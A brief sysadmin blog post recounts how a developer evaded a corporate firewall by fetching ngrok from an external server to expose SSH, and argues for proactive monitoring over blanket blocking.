Firewalls are designed with the best intentions in mind, but, they come with their faults. As a systems administrator, I have to routinely deal with users evading the firewalls with ssh tunnels. Some are unknowingly doing this, by using an application with embedded malware against company policies that tries to evade detection.

Today was different however, a clever developer wanted to expose SSH direct into their virtual machine, and couldn’t forward it easily with tunnels, so decided to download ngrok onto their own external server, and wget it from there, this circumvented our policies entirely in one swift blow. We noticed some unusual traffic headed out to ngrok (we have some legitimate tools which use it, after approval) from unauthorized origins, and quickly found the origin.

It brought upon another issue with firewalls – we obviously don’t want to nullroute the entire world, but we want to keep the internal safe. We’ve done a lot in terms of blocking intrusive services, but it’s never bulletproof. Should we be blocking the entire world and only whitelisting what we know is generally considered safe?

No, we shouldn’t.

By blocking the entire world, we’re causing more problems then we can solve. It caused long delays, content missing, and some legitimate sites to not render anymore. IPs are moving targets, IPv4 is almost entirely exhausted, IPv6 is taking over, and there’s too many targets to block. Proactive monitoring was able to nip this in the butt very quickly, however, without it we would’ve never known.

Pro Tip: Always proactively monitor your firewall, and machines on the network.